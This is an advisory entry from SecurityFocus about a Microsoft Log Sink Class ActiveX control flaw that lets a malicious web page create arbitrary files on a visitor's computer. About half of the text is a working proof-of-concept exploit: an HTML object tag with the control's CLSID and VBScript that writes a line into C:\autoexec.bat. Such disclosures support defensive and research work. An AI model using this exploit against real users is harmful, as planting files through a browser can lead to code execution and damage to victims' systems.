13 lines
No EOL
669 B
Text
13 lines
No EOL
669 B
Text
source: https://www.securityfocus.com/bid/12646/info
|
|
|
|
Microsoft Log Sink Class ActiveX control can allow remote attackers to create arbitrary files on an affected computer.
|
|
|
|
A remote attacker can exploit this issue by crafting a malicious Web site that triggers this vulnerability and enticing a user to visit the site. If successful, the attacker may create arbitrary files on the computer. This may lead to various attacks including arbitrary code execution.
|
|
|
|
<object id=ctl
|
|
classid="clsid:{DE4735F3-7532-4895-93DC-9A10C4257173}"></object>
|
|
<script language="vbscript">
|
|
ctl.initsink "C:\autoexec.bat"
|
|
ctl.addstring "echo Drive formatted? ", ""
|
|
ctl.deinitsink
|
|
</script> |